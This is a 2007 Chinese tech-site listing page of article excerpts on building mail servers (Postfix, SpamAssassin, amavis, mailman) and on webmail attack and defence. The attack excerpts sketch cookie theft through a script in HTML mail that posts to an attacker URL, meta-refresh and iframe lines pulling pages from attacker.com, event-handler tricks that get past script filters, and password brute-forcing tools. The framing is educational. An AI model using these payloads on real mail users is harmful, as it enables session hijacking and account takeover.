邮件服务 - 九核技术交流网，专注互联网！

2007-11-01Webmail攻防实战(6)
如果攻击者能够获取用户WebMail的cookie信息，那么就能很容易地侵入用户的WebMail。攻击者如何获取用户WebMail的cookie信息呢？如果攻击者在用户的电脑上安装了木马，或者能够从网络线路上对用户进行嗅探侦听，那么获取cookie信息自然不成问题，不过这并不是我们讨论问题的意义所在，因为都能够这样了，又何必大费周折去获取cookie信息，直接获取邮箱密码就是了。如果WebMail系统存在跨站脚本执行漏洞，那么攻击者就能欺骗用户从而轻易地获取cookie信息，虽然众多网站存在此漏洞，但存在此漏洞的WebMail系统还很少见。含有恶性脚本程序的html邮件能使攻击者获取WebMail的cookie信息。Html邮件中的脚本程序先提取当前WebMail的cookie信息，然后把它赋值给某个表单元素，再将表单自动提交给攻击者，攻击者从而获得cookie会话信息。下面是一段演示程序：　　以下为引用的内容：　　＜body＞　　＜formmethod="post"action="http://attack .... [阅读全文]
来源：云南设计港作者：

2007-10-30Webmail攻防实战(5)
除了可以在html邮件中直接嵌入脚本程序外，攻击者还可以设计一些html代码，在用户打开html邮件时，不知不觉引入另一个html文件，而此文件中正含有恶性代码，这样不仅能直接绕过WebMail系统对脚本程序的过滤，而且还能有效避开提供了防毒服务的邮件系统对恶性代码的查杀。下面是几个调用html文件的例子：(1)Refresh到另一个页面：　　以下为引用的内容：　　＜body＞　　＜metahttp-equiv="refresh"content="1；URL=http://www.attacker.com/another.htm"＞　　＜/body＞　　(2)Iframe引入另一个页面：　　以下为引用的内容：　　＜body＞　　＜iframesrc="http://www.attacker.com/import.htm"frameborder="0"＞＜/iframe＞　　＜/body＞ .... [阅读全文]
来源：云南设计港作者：

2007-10-26Webmail攻防实战(4)
鉴于脚本程序可能带来的危险，WebMail系统完全有必要禁止html邮件中的脚本程序。禁止脚本程序的基本做法就是过滤掉html源程序中能够使脚本程序运行的代码，如script元素等，在这方面做的最好的莫过于hotmail了。下面是些常见的绕过脚本程序过滤的方法，不少的WebMail系统仍然没有完全改正：(1)在html语言里，除了script元素内的或在script元素内引入的脚本程序能在html页面装载时被运行外，使用事件属性也能调用脚本程序运行，事件属性在JavaScript语言里被称为事件句柄，用于对页面上的某个特定事件（如鼠标点击、表单提交）做出响应，驱动javascript程序运行。它的语法如下：　　　　＜tagattribute1attribute2onEventName="javascriptcode；"＞　　例如：　　以下为引用的内容：　　＜bodyonload="alert('JavaScript#1isexecuted')；"＞　　＜ahref="#"oncl .... [阅读全文]
来源：云南设计港作者：

2007-10-24Webmail攻防实战(3)
在用户正确完成以上各步骤以后，WebMail系统就会让用户恢复自己邮箱帐户的密码。密码恢复的方式又各有不同，一般有如下几种方式，安全程度各有不同：1、页面返回：返回的页面里显示用户的邮箱密码。这样故然方便省事，但是如果让攻击者得到密码，则能在丝毫不惊动用户的情况下使用用户的邮箱，使得攻击者能长期监视用户的邮箱使用情况，给用户带来更大的安全隐患。2、邮件发送：将密码发送到用户注册时登记的另一个邮箱里。对于攻击者来说，忙了半天，仍然是一无所获，除非继续去攻击另一个邮箱；对于用户来说，在另一个邮箱里收到发来的密码则是一个警告，说明有攻击者猜测到了他的邮箱密码提示问题，迫使用户尽快改变自己的密码提示问题。不过，如果用户注册时登记的不是一个正确的邮箱，或者该邮箱已经失效，那么，这样不仅是攻击者，就是用户本人也永远得不到密码了。有些WebMail系统在注册时要求用户登记正确的邮件地址，并把邮箱开通的验证信息发往该邮件地址，不过这样仍然不能避免用户在邮箱失效后不能恢复自己邮箱密码的情况发生。3、密码重设：让用户重新设置一个密码。这种方式相比“页面返回”方式，在攻击者重设密码后 .... [阅读全文]
来源：云南设计港作者：

2007-10-22Webmail攻防实战(2)
二、WebMail暴力破解Internet上客户端与服务端的交互，基本上都是通过在客户端以提交表单的形式交由服务端程序（如CGI、ASP等）处理来实现的，WebMail的密码验证即如此，用户在浏览器的表单元素里输入帐户名、密码等信息并提交以后，服务端对其进行验证，如果正确的话，则欢迎用户进入自己的WebMail页面，否则，返回一个出错页面给客户端。籍此，攻击者借助一些黑客工具，不断的用不同的密码尝试登录，通过比较返回页面的异同，从而判断出邮箱密码是否破解成功。帮助攻击者完成此类暴力破解的工具有不少，如wwwhack、小榕的溯雪等，尤以溯雪的功能最为强大，它本身已经是一个功能完善的浏览器，通过分析和提取页面中的表单，给相应的表单元素挂上字典文件，再根据表单提交后返回的错误标志判断破解是否成功。当然我们也看到，溯雪之类的web探测器，可以探测到的不仅是WebMail的密码，像论坛、聊天室之类所有通过表单进行验证登录的帐户密码都是可以探测到的。对于WebMail的暴力破解，许多WebMail系统都采取了相应的防范措施。如果某帐户在较短的时间内有多次错误登录，即认为该帐户受到了暴力破解，防范措 .... [阅读全文]
来源：云南设计港作者：

2007-10-19Webmail攻防实战（1）
WebMail是指利用浏览器通过web方式来收发电子邮件的服务或技术，不需借助邮件客户端，可以说只要能上网就能使用WebMail，极大地方便了用户对邮件的收发。对于不能熟练使用邮件客户端，或者在网吧不便使用邮件客户端的用户来说，WebMail更是必不可少的选择。Email能够成为当今Internet上应用最广泛的网络服务，WebMail可谓功不可没。由于用户的使用不当或者WebMail系统的开发不周，都有可能给WebMail的使用带来更多的安全威胁。同样，WebMail系统作为当今电子邮件系统的重要组成部份，它的安全性也是不可忽视的。一、邮件地址欺骗邮件地址欺骗是非常简单和容易的，攻击者针对用户的电子邮件地址，取一个相似的电子邮件名，在WebMail的邮箱配置中将“发件人姓名”配置成与用户一样的发件人姓名（有些WebMail系统没有提供此功能），然后冒充该用户发送电子邮件，在他人收到邮件时，往往不会从邮件地址、邮件信息头等上面做仔细检查，从发件人姓名、邮件内容等上面又看不出异样，误以为真，攻击者从而达到欺骗的目的。例如某用户的电子邮件名是wolfe，攻击者就会取 .... [阅读全文]
来源：云南设计港作者：

2007-10-17构建反病毒反垃圾邮件系统(九)
然后再次发送中文邮件给邮件列表，发现邮件列表就能够正常转发了。5、邮件列表的配置Default.py和mm_cfg.py的配置是针对全局的，对全局配置文件的修改不会影响到已经存在的邮件列表。mailman提供了config_list这个命令来对单个邮件列表进行配置，先导出该邮件列表的配置：#/usr/local/mailman/bin/config_list-o/tmp/configmailman然后修改/tmp/config文件，里面有很多选项，可以根据自己的要求修改，比如加上回复到邮件列表的邮件头、去掉mailman自动加的边脚等等，最后把这个配置文件导回给邮件列表就可以了：#/usr/local/mailman/bin/config_list-i/tmp/configmailman习惯了发现mailman配起来也是蛮简单的。五、其它事项1、courier-pop有一个值得注意的问题，如果不小心/etc/init.d/courier-popstop以后，再start起来，有时候会发现不能登陆pop，日志会提示：courierpop3login:chdir:Nosuchfileord .... [阅读全文]
来源：云南设计港作者：

2007-10-11构建反病毒反垃圾邮件系统(八)
把用户添加到邮件列表里测试一些，建一个文本文件，比如members.txt，一行一个邮件地址，然后执行如下命令就可以了：#/usr/local/mailman/bin/add_members-nmembers.txtmailman3、postfix相关配置还需要修改postfix的配置文件才能使mailman工作正常，修改main.cf，加上：以下为引用的内容：　　owner_request_special=no　　recipient_delimiter=+　　unknown_local_recipient_reject_code=550 　　修改alias_maps和virtual_maps为：　　以下为引用的内容：　　alias_maps=hash:/usr/local/mailman/data/aliases,　　mysql:/etc/postfix/mysql-aliases.cf　　virtual_maps=hash:/usr/local/mailman/da .... [阅读全文]
来源：云南设计港作者：

2007-10-10构建反病毒反垃圾邮件系统(七)
SpamAssassin的打分标准见http://spamassassin.org/tests.html，默认的标准可能并不适合我们，比如SUBJ_FULL_OF_8BITS有4分多，这个比较容易误伤友军，应该降低该分值。只需在配置文件里加上：scoreSUBJ_FULL_OF_8BITS2那么SUBJ_FULL_OF_8BITS就只能评2分了。很多垃圾邮件内容都会有免费什么什么的，所以免费可以作为关键字，打上较高分数：bodyCH_FREE/免费/describeCH_FREEContainChineseFreescoreCH_FREE3.0建立Bayes学习知识库：#cd/var/lib/amavis/.spamassassin#/usr/local/bin/sa-learn--rebuild-D-puser_prefs以后spamassassin会自动学习更新。3、amavis相关配置修改/etc/amavis/amavisd.conf文件启用ANTI-SPAM功能：#@bypass_spam_checks_acl=qw(.);运行amavisddebug，看到有如下的信息，说明 .... [阅读全文]
来源：云南设计港作者：

2007-10-08构建反病毒反垃圾邮件系统(六)
安装四个下载的软件包：#dpkg-i*.deb修改/etc/amavis/amavisd.conf：　　以下为引用的内容：　　@inet_acl=qw(127/81.2.3.4/32);#1.2.3.4isyourexternalip..becausewantmaybealsoacceptmailfromthatin-terface,it'suptoyou.　　$warnvirussender=1;#Iwanttowarnpeople,whohavegotvirus.　　$warnvirusrecip=1;#Iwanttowarnmyusersaboutvirussendtothem.　　$warn_offsite=1;#Iwanttowarnsenders/recipients,thatarenotlocatedonmyserver　　$mailfrom_notify_admin='virusalert@example.com';#　　$mailfrom_notify_recip='virusalert@example.com';#Ch .... [阅读全文]
来源：云南设计港作者：

2007-09-30构建反病毒反垃圾邮件系统(五)
二、防病毒系统1、安装McAfeeuvscanforlinuxMcAfeeuvscanforlinux虽然是试用，但是没有什么限制，可以升级，也没有过期。　　以下为引用的内容：　　#wgethttp://www.XXXX.com/products/evaluation/virusscan/english/　　cmdline/linux/version_4.24/intel/vlnx424e.tar.Z　　#tarxzfvlnx424e.tar.Z　　#./install-uvscan 　　默认会装到/usr/local/uvscan目录下，不过uvscan需要libstdc++.so.2.8，直接运行出现如下错误：　　以下为引用的内容：　　#uvscan　　uvscan:errorwhileloadingsharedlibraries:libstdc++.so.2.8:　　cannotopensharedobjectfile:Nosuchfileordirectory .... [阅读全文]
来源：云南设计港作者：

2007-09-28构建反病毒反垃圾邮件系统(四)
4、TLS支持通过修改/usr/lib/ssl/misc/CA.pll脚本实现，以下修改后CA1.pl和未修改CA.pl之间的对比：　　以下为引用的内容：　　***CA.pl　　---CA1.pl　　***************　　***59,69****　　}elsif(/^-newcert$/){　　#createacertificate　　!system("$REQ-new-x509-keyoutnewreq.pem-outnewreq.pem$DAYS");　　$RET=$?;　　print"Certificate(andprivatekey)isinnewreq.pem\n"　　}elsif(/^-newreq$/){　　#createacertificaterequest　　!system("$REQ-new-keyoutnewreq.pem-outnewreq.pem$DAYS");　　$RET=$?;　　print"Request(andp .... [阅读全文]
来源：云南设计港作者：

2007-09-27构建反病毒反垃圾邮件系统(三)
以下为引用的内容：　　mysql-virtual.cf　　　　user=mysql-postfix-user　　password=mysql-postfix-pass　　dbname=postfix　　table=virtual　　select_field=destination　　where_field=email　　hosts=127.0.0.1　　　　mysql-virtual-maps.cf　　　　user=mysql-postfix-user　　password=mysql-postfix-pass　　dbname=postfix　　table=users　　select_field=maildir　　where_field=email　　additional_conditions=andpostfix='y'　　hosts=127.0.0.1　　　　mysql-virtual-uid.cf　　　　user=mysql-postfix-user　　password=mysql-postfix-pass　　dbname .... [阅读全文]
来源：云南设计港作者：

2007-09-26构建反病毒反垃圾邮件系统(二)
3、与MySQL结合的配置及数据表结构注意：配置mysql相关部分要写127.0.0.1而不要写localhost，如果使用localhost，postfix会尝试socket连接。debian的postfix使用socket连接好像有问题。mysql不能使用skip-networking选项，要使用--bind-address=127.0.0.1让它监听在127.0.0.1。（非常感谢MartinList-Petersen指点）还有要注意的是如果是自己编译的mysql，建议在启动的时候加上--socket=/var/run/mysqld/mysqld.sock参数，因为pam-mysql又需要使用这个socket。如果你的apache+php是自己编译的话，php又需要重新编译，配置的时候需要加上--with-mysql-sock=/var/run/mysqld/mysqld.sock参数。是不是比较烦？这不过是个开始。MySQL的数据表：　　以下为引用的内容：　　CREATETABLEalias(　　idint(11)unsigned .... [阅读全文]
来源：云南设计港作者：

2007-09-21构建反病毒反垃圾邮件系统(一)
原来qmail系统的邮箱一天起码要收十几份垃圾、病毒邮件，实在是比较烦，不是很喜欢qmail，特别是日志，让人不知所云，所以干脆考虑更换邮件系统。系统平台为DebianWoody3.0一、邮件系统的安装1、软件包安装Postfix+Courier-IMAP+Cyrus-SASL+PAM_MySQL+MySQL这种安装方式简单易行，在Debian下的安装更加方便：以下为引用的内容：　　#apt-getinstallcourier-poppostfix-mysqlpostfix-tlscourier-authdaemon\　　courier-authmysqllibpam-mysqllibsasl7libsasl-modules-plaincourier-imap 如果你的系统本身没有mysql，那么在上面的列表里还要加上mysql-server。apt在安装过程中会有简单的提示，要求填上系统的域名等信息。2、postfix的配置修改main.cf：添加：home_mailbox=Maildir/告诉postfix使用M .... [阅读全文]
来源：云南设计港作者：

2007-09-20选择邮件服务器十二要素(3)
六、邮箱管理能力考察邮件服务器的邮箱管理能力时,应该特别注意产品在为用户建立邮箱时的存储方式。目前主要有三种类型:第一种是集中存放。第二种是为每个用户邮箱建立一个计算机文件子目录。第三种是为每个用户邮箱建立一个计算机文件。在考察邮箱存储方式时,还应该注意是否支持跨越物理磁盘存放。能够并行访问多个物理磁盘的系统,可以提供更高的用户服务响应速度。1)单一邮箱和多邮箱由于所采用的邮件服务协议不同,邮件服务器为每个用户提供的邮箱或者邮箱文件夹是不一样的。2)邮箱容量控制为每个用户提供多大的邮件存储空间,不同的邮件服务器提供了不同的设置手段。制约邮箱容量的最终硬件条件是可以使用的磁盘空间。3)收信邮箱管理如何管理用户收信邮箱中的信件,不同的邮件服务器提供的功能也不相同。对于政府部门或商业机构来说,通常将电子邮件视为机构的财产,不允许雇员使用机构的电子邮件系统收发与业务无关的私人信件。因此,机构希望邮件服务器的管理员保留对用户邮件的监察权。这并不牵涉侵犯个人隐私权的问题。但是对于直接向个人提供公众电子邮件服务的机构来说, 就应该注意这个问题。4)发信邮箱管理发信邮箱也称为发信队列。对于等待发送的信 .... [阅读全文]
来源：天极网作者：

2007-09-19选择邮件服务器十二要素(2)
3)IMAP4协议IMAP协议是Internet消息访问协议(Internet Message Access Protocol)的缩写,现在常用的是版本 4,它为用户提供了有选择的从邮件服务器接收邮件的功能、基于服务器的信息处理功能和共享信箱功能。IMAP4在用户登录到邮件服务器以后,允许采取多段处理方式查询邮件。首先,用户可以仅读取电子邮箱中的邮件信头(Messageheader);然后,用户可以选择下载指定的邮件或者全部邮件。IMAP4在邮件服务器一端为用户保留邮件。4)HTTP协议和HTML语言HTTP协议是超级文本传输协议(Hyper Text Transfer Protocol)的缩写,支持这个协议的邮件服务器,可以提供通过 Web的电子邮件收发服务。5)MIME协议MIME是多用途Internet邮件扩展(Multipurpose Internet Mail Extensions)协议的缩写。作为对 SMTP协议的扩充,MIME规定了通过SMTP协议传输非文本电子邮件附件的标准。目前,MIME的用途早已经超越了收发电子邮件的范围,成为在 Internet上传输多媒体信息的 .... [阅读全文]
来源：天极网作者：

2007-09-14选择邮件服务器十二要素(1)
目前，市场上有多种Internet邮件服务器产品供选择，这些邮件服务器产品价格各异，所提供的功能也有不少差别。对于网络管理员来说，如何根据自身业务的需求，选择功能完备、价格合理的邮件服务器产品，是一个多因素的综合决策问题。选择邮件服务器时，虽然需要考虑的因素有许多，但主要应该着重考察产品的系统支持能力、服务协议支持能力、多邮件服务器支持能力、用户管理能力、邮箱管理能力、客户端软件支持能力、通信能力、安全防护能力、系统管理能力、版本、价格、升级与售后服务等以下十二个因素。一、系统支持能力无论选择何种计算机产品，系统的支持能力都是首先必须考虑的问题，硬件产品如此，软件产品同样如此。对于邮件服务器来说，在系统支持能力方面应该考察以下三个问题：1)服务器运行平台支持能力对于一个软件服务器产品来说，其运行平台的支持能力无非是单平台和跨平台两种。如果一个网络管理员管理的网络支持多种操作系统并存运行，且具有多个各自独立管理的邮件服务器，则在必须考虑各个邮件服务器协同工作和统一管理的方便时，建议优先考虑跨平台产品。否则，可以仅考虑满足自己所使用平台的产品。2)业务处理能力一些邮件服务器产品常常分为企 .... [阅读全文]
来源：天极网作者：

2007-09-13在Fedora上建立自己的邮件服务器(5)
八、Courier-IMAPInstallA.先在普通用户下　　以下为引用的内容：　　#./configure-without-authpwd-without-authpam-without-authuserdb-without-authshadow　　-without-cram-without-chkpw-without-ldap-without-pgsql-without-authdaemon　　-without-authcustom-with-authmysql　　#make　　#makecheck　　#suroot　　#makeinstall　　#makeinstall-configure 　　B.修改authmysqlrc,这里是简单的　　以下为引用的内容：　　#DEFAULT_DOMAINdomain.tld　　MYSQL_CRYPT_PWFIELDpassword　　MYSQL_DATABASEpostfix　　MYSQL_GID_FIELD'12345' .... [阅读全文]
来源：云南设计港作者：

2007-09-12在Fedora上建立自己的邮件服务器(4)
D.配置postfix.1.主要是main.cf的配置。以下为引用的内容：　　virtual_alias_maps=mysql:/etc/postfix/mysql_virtual_alias_maps.cf　　virtual_gid_maps=static:12345　　virtual_mailbox_base=/usr/local/virtual　　virtual_mailbox_domains=mysql:/etc/postfix/mysql_virtual_domains_maps.cf　　virtual_mailbox_maps=mysql:/etc/postfix/mysql_virtual_mailbox_maps.cf　　virtual_mailbox_limit=51200000　　virtual_minimum_uid=12345　　virtual_transport=virtual　　virtual_uid_maps=static:12345　　　　smtpd_sasl_auth_enable=yes　　#smtpd .... [阅读全文]
来源：天极Yesky作者：

共有62条记录,4页,当前第 2 页 1 2 3 4

9core.com - 九核技术交流网